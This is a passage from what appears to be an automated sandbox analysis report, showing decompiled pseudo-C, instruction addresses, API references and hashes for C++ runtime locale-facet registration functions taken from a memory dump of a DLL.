																						goto L40;
																					}
																				} else {
																					_t271 = _t278;
																					goto L40;
																				}
																			}
																		} else {
																			_t270 =  *(_t286 - 0x10);
																			 *(_t286 - 0x10) = _t270;
																			 *(_t286 - 4) = 1;
																			E6E1C6FD3(__eflags, _t270);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
																			 *0x6e286e00 = _t270;
																			goto L33;
																		}
																	} else {
																		_t270 = _t277;
																		goto L33;
																	}
																}
															} else {
																_t269 =  *(_t286 - 0x10);
																 *(_t286 - 0x10) = _t269;
																 *(_t286 - 4) = 1;
																E6E1C6FD3(__eflags, _t269);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
																 *0x6e286dcc = _t269;
																goto L26;
															}
														} else {
															_t269 = _t276;
															goto L26;
														}
													}
												} else {
													_t268 =  *(_t286 - 0x10);
													 *(_t286 - 0x10) = _t268;
													 *(_t286 - 4) = 1;
													E6E1C6FD3(__eflags, _t268);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
													 *0x6e286dfc = _t268;
													goto L19;
												}
											} else {
												_t268 = _t275;
												goto L19;
											}
										}
									} else {
										_t267 =  *(_t286 - 0x10);
										 *(_t286 - 0x10) = _t267;
										 *(_t286 - 4) = 1;
										E6E1C6FD3(__eflags, _t267);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
										 *0x6e286de0 = _t267;
										goto L12;
									}
								} else {
									_t267 = _t274;
									goto L12;
								}
							}
						} else {
							_t266 =  *(_t286 - 0x10);
							 *(_t286 - 0x10) = _t266;
							 *(_t286 - 4) = 1;
							E6E1C6FD3(__eflags, _t266);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
							 *0x6e286ddc = _t266;
							goto L5;
						}
					} else {
						_t266 = _t273;
						goto L5;
					}
				}
			}

0x6e1cf94b
0x6e1cf94b
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf97c
0x6e1cf981
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
0x00000000
0x6e1cfb7d
0x6e1cfb7b
0x6e1cfaee
0x6e1cfaee
0x6e1cfaf1
0x6e1cfaf5
0x6e1cfaf9
0x6e1cfb06
0x6e1cfb0e
0x6e1cfb10
0x00000000
0x6e1cfb10
0x6e1cfad7
0x6e1cfad7
0x00000000
0x6e1cfad7
0x6e1cfad5
0x6e1cfa48
0x6e1cfa48
0x6e1cfa4b
0x6e1cfa4f
0x6e1cfa53
0x6e1cfa60
0x6e1cfa68
0x6e1cfa6a
0x00000000
0x6e1cfa6a
0x6e1cfa31
0x6e1cfa31
0x00000000
0x6e1cfa31
0x6e1cfa2f
0x6e1cf9a2
0x6e1cf9a2
0x6e1cf9a5
0x6e1cf9a9
0x6e1cf9ad
0x6e1cf9ba
0x6e1cf9c2
0x6e1cf9c4
0x00000000
0x6e1cf9c4
0x6e1cf98b
0x6e1cf98b
0x00000000
0x6e1cf98b
0x6e1cf989

APIs

__EH_prolog3.LIBCMT ref: 6E1CF952
std::_Lockit::_Lockit.LIBCPMT ref: 6E1CF95C
int.LIBCPMT ref: 6E1CF973

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1CF9AD
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1CF9CD
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1CF9EB

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 9e2d974579aa3e0147b8a555e38e530caf846cd6f441f6f4e1fa72fa73bd17ac
Instruction ID: 19326a9d7719609cb019ca64b5657d603507dd1e5f02a9f181aa328bcb773ce6
Opcode Fuzzy Hash: 9e2d974579aa3e0147b8a555e38e530caf846cd6f441f6f4e1fa72fa73bd17ac
Instruction Fuzzy Hash: B4117A759105289FCF01EBE4C864AFDF37AAF64B04F204809E021EB280CF789985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4747, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C4747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6E1E00AC(0x6e22816f, __ebx, __edi, __esi, 0x18);
				E6E1C6653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6e29ce7c; // 0x35a95b8
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6E1A161C(0x6e29ce90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6E1A171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6E1C66BA(_t47 - 0x14);
					return E6E1E0075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6E1C4F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6E1A1438(_t39);
							E6E1E3D74(_t47 - 0x20, 0x6e283504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6E1C6FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6e29ce7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}

0x6e1c474e
0x6e1c4758
0x6e1c475d
0x6e1c4766
0x6e1c476c
0x6e1c476f
0x6e1c4774
0x6e1c4778
0x6e1c477d
0x6e1c4781
0x6e1c47bc
0x6e1c47bf
0x6e1c47cb
0x6e1c4783
0x6e1c4785
0x6e1c478b
0x6e1c4791
0x6e1c4799
0x6e1c479c
0x6e1c47cc
0x6e1c47cf
0x6e1c47dd
0x6e1c47e2
0x6e1c47e3
0x6e1c47e7
0x6e1c479e
0x6e1c479e
0x6e1c47a1
0x6e1c47a5
0x6e1c47a9
0x6e1c47b3
0x6e1c47b6
0x00000000
0x6e1c47b6
0x6e1c4787
0x6e1c4787
0x00000000
0x6e1c4787
0x6e1c4785

APIs

__EH_prolog3.LIBCMT ref: 6E1C474E
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4758
int.LIBCPMT ref: 6E1C476F

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C47A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C47BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C47DD

Memory Dump Source

Source File: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000002.00000002.523408165.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.531209003.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.550197370.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.552470315.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.553411389.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: a663725558be09726d25145bc23f82147ebea613ccf9e71b6a8feed4fbb5b3c3
Instruction ID: c517de240fc0369a7a041250e9d3e7debac3dec11e6408834f476cdadaedf7c6
Opcode Fuzzy Hash: a663725558be09726d25145bc23f82147ebea613ccf9e71b6a8feed4fbb5b3c3
Instruction Fuzzy Hash: 311159759006288FCB01DBE4C804AFEB779BF25B04F20490CE521EB290DB788985E7D2

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CF7FF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6E1CF7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6E1E00AC(0x6e2283cf, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t374 - 0x14, 0);
				_t357 =  *0x6e286dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6E1A161C(0x6e286d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6E1C66BA(_t374 - 0x14);
					return E6E1E0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6E1D1339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t374 - 0x20);
							E6E1E3D74(_t374 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e2283cf, __ebx, _t348, _t357, 0x14);
							E6E1C6653(_t374 - 0x14, 0);
							_t358 =  *0x6e286db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6E1A161C(0x6e286d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6E1C66BA(_t374 - 0x14);
								return E6E1E0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6E1D13A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6E1A1438(_t374 - 0x20);
										E6E1E3D74(_t374 - 0x20, 0x6e283504);
										asm("int3");
										E6E1E00AC(0x6e2283cf, _t265, _t349, _t358, 0x14);
										E6E1C6653(_t374 - 0x14, 0);
										_t359 =  *0x6e286ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6E1A161C(0x6e286d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6E1C66BA(_t374 - 0x14);
											return E6E1E0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6E1D1409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6E1A1438(_t374 - 0x20);
													E6E1E3D74(_t374 - 0x20, 0x6e283504);
													asm("int3");
													E6E1E00AC(0x6e2283cf, _t265, _t350, _t359, 0x14);
													E6E1C6653(_t374 - 0x14, 0);
													_t360 =  *0x6e286de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6E1A161C(0x6e286d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6E1C66BA(_t374 - 0x14);
														return E6E1E0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6E1D1471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6E1A1438(_t374 - 0x20);
																E6E1E3D74(_t374 - 0x20, 0x6e283504);
																asm("int3");
																E6E1E00AC(0x6e2283cf, _t265, _t351, _t360, 0x14);
																E6E1C6653(_t374 - 0x14, 0);
																_t361 =  *0x6e286dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6E1A161C(0x6e286da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6E1C66BA(_t374 - 0x14);
																	return E6E1E0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6E1D14EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1A1438(_t374 - 0x20);
																			E6E1E3D74(_t374 - 0x20, 0x6e283504);
																			asm("int3");
																			E6E1E00AC(0x6e2283cf, _t265, _t352, _t361, 0x14);
																			E6E1C6653(_t374 - 0x14, 0);
																			_t362 =  *0x6e286dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6E1A161C(0x6e286d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6E1C66BA(_t374 - 0x14);
																				return E6E1E0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6E1D1558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1A1438(_t374 - 0x20);
																						E6E1E3D74(_t374 - 0x20, 0x6e283504);
																						asm("int3");
																						E6E1E00AC(0x6e2283cf, _t265, _t353, _t362, 0x14);
																						E6E1C6653(_t374 - 0x14, 0);
																						_t363 =  *0x6e286e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6E1A161C(0x6e286dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6E1C66BA(_t374 - 0x14);
																							return E6E1E0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6E1D15C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6E1A1438(_t374 - 0x20);
																									E6E1E3D74(_t374 - 0x20, 0x6e283504);
																									asm("int3");
																									E6E1E00AC(0x6e2283cf, _t265, _t354, _t363, 0x14);
																									E6E1C6653(_t374 - 0x14, 0);
																									_t364 =  *0x6e286dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6E1A161C(0x6e286d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6E1A171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6E1C66BA(_t374 - 0x14);
																										return E6E1E0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6E1D162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6E1A1438(_t321);
																												E6E1E3D74(_t374 - 0x20, 0x6e283504);
																												asm("int3");
																												E6E1E00AC(0x6e22851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6e22c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6E1D542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6E1E0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6E1C6FD3(__eflags, _t355);
																												 *0x6e22a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6e286dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6E1C6FD3(__eflags, _t354);
																									 *0x6e22a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6e286e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6E1C6FD3(__eflags, _t353);
																						 *0x6e22a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6e286dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6E1C6FD3(__eflags, _t352);
																			 *0x6e22a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6e286dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6E1C6FD3(__eflags, _t351);
																 *0x6e22a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6e286de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6E1C6FD3(__eflags, _t350);
													 *0x6e22a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6e286ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6E1C6FD3(__eflags, _t349);
										 *0x6e22a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6e286db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6E1C6FD3(__eflags, _t348);
							 *0x6e22a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6e286dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6e1cf7ff
0x6e1cf7ff
0x6e1cf806
0x6e1cf810
0x6e1cf815
0x6e1cf820
0x6e1cf824
0x6e1cf827
0x6e1cf82c
0x6e1cf830
0x6e1cf835
0x6e1cf839
0x6e1cf87e
0x6e1cf881
0x6e1cf88d
0x6e1cf83b
0x6e1cf83d
0x6e1cf843
0x6e1cf849
0x6e1cf851
0x6e1cf854
0x6e1cf891
0x6e1cf89f
0x6e1cf8a4
0x6e1cf8ac
0x6e1cf8b6
0x6e1cf8bb
0x6e1cf8c6
0x6e1cf8ca
0x6e1cf8cd
0x6e1cf8d2
0x6e1cf8db
0x6e1cf8dd
0x6e1cf8df
0x6e1cf924
0x6e1cf927
0x6e1cf933
0x6e1cf8e1
0x6e1cf8e1
0x6e1cf8e3
0x6e1cf8e9
0x6e1cf8ef
0x6e1cf8f7
0x6e1cf8fa
0x6e1cf937
0x6e1cf945
0x6e1cf94a
0x6e1cf952
0x6e1cf95c
0x6e1cf961
0x6e1cf96c
0x6e1cf970
0x6e1cf973
0x6e1cf978
0x6e1cf981
0x6e1cf983
0x6e1cf985
0x6e1cf9ca
0x6e1cf9cd
0x6e1cf9d9
0x6e1cf987
0x6e1cf987
0x6e1cf989
0x6e1cf98f
0x6e1cf995
0x6e1cf99d
0x6e1cf9a0
0x6e1cf9dd
0x6e1cf9eb
0x6e1cf9f0
0x6e1cf9f8
0x6e1cfa02
0x6e1cfa07
0x6e1cfa12
0x6e1cfa16
0x6e1cfa19
0x6e1cfa1e
0x6e1cfa27
0x6e1cfa29
0x6e1cfa2b
0x6e1cfa70
0x6e1cfa73
0x6e1cfa7f
0x6e1cfa2d
0x6e1cfa2d
0x6e1cfa2f
0x6e1cfa35
0x6e1cfa3b
0x6e1cfa43
0x6e1cfa46
0x6e1cfa83
0x6e1cfa91
0x6e1cfa96
0x6e1cfa9e
0x6e1cfaa8
0x6e1cfaad
0x6e1cfab8
0x6e1cfabc
0x6e1cfabf
0x6e1cfac4
0x6e1cfacd
0x6e1cfacf
0x6e1cfad1
0x6e1cfb16
0x6e1cfb19
0x6e1cfb25
0x6e1cfad3
0x6e1cfad3
0x6e1cfad5
0x6e1cfadb
0x6e1cfae1
0x6e1cfae9
0x6e1cfaec
0x6e1cfb29
0x6e1cfb37
0x6e1cfb3c
0x6e1cfb44
0x6e1cfb4e
0x6e1cfb53
0x6e1cfb5e
0x6e1cfb62
0x6e1cfb65
0x6e1cfb6a
0x6e1cfb73
0x6e1cfb75
0x6e1cfb77
0x6e1cfbbc
0x6e1cfbbf
0x6e1cfbcb
0x6e1cfb79
0x6e1cfb79
0x6e1cfb7b
0x6e1cfb81
0x6e1cfb87
0x6e1cfb8f
0x6e1cfb92
0x6e1cfbcf
0x6e1cfbdd
0x6e1cfbe2
0x6e1cfbea
0x6e1cfbf4
0x6e1cfbf9
0x6e1cfc04
0x6e1cfc08
0x6e1cfc0b
0x6e1cfc10
0x6e1cfc19
0x6e1cfc1b
0x6e1cfc1d
0x6e1cfc62
0x6e1cfc65
0x6e1cfc71
0x6e1cfc1f
0x6e1cfc1f
0x6e1cfc21
0x6e1cfc27
0x6e1cfc2d
0x6e1cfc35
0x6e1cfc38
0x6e1cfc75
0x6e1cfc83
0x6e1cfc88
0x6e1cfc90
0x6e1cfc9a
0x6e1cfc9f
0x6e1cfcaa
0x6e1cfcae
0x6e1cfcb1
0x6e1cfcb6
0x6e1cfcbf
0x6e1cfcc1
0x6e1cfcc3
0x6e1cfd08
0x6e1cfd0b
0x6e1cfd17
0x6e1cfcc5
0x6e1cfcc5
0x6e1cfcc7
0x6e1cfccd
0x6e1cfcd3
0x6e1cfcdb
0x6e1cfcde
0x6e1cfd18
0x6e1cfd1b
0x6e1cfd29
0x6e1cfd2e
0x6e1cfd36
0x6e1cfd3b
0x6e1cfd3d
0x6e1cfd43
0x6e1cfd46
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd4f
0x6e1cfd53
0x6e1cfd59
0x6e1cfd5c
0x6e1cfd68
0x6e1cfce0
0x6e1cfce0
0x6e1cfce3
0x6e1cfce7
0x6e1cfceb
0x6e1cfcf8
0x6e1cfd00
0x6e1cfd02
0x00000000
0x6e1cfd02
0x6e1cfcc9
0x6e1cfcc9
0x00000000
0x6e1cfcc9
0x6e1cfcc7
0x6e1cfc3a
0x6e1cfc3a
0x6e1cfc3d
0x6e1cfc41
0x6e1cfc45
0x6e1cfc52
0x6e1cfc5a
0x6e1cfc5c
0x00000000
0x6e1cfc5c
0x6e1cfc23
0x6e1cfc23
0x00000000
0x6e1cfc23
0x6e1cfc21
0x6e1cfb94
0x6e1cfb94
0x6e1cfb97
0x6e1cfb9b
0x6e1cfb9f
0x6e1cfbac
0x6e1cfbb4
0x6e1cfbb6
0x00000000
0x6e1cfbb6
0x6e1cfb7d
0x6e1cfb7d
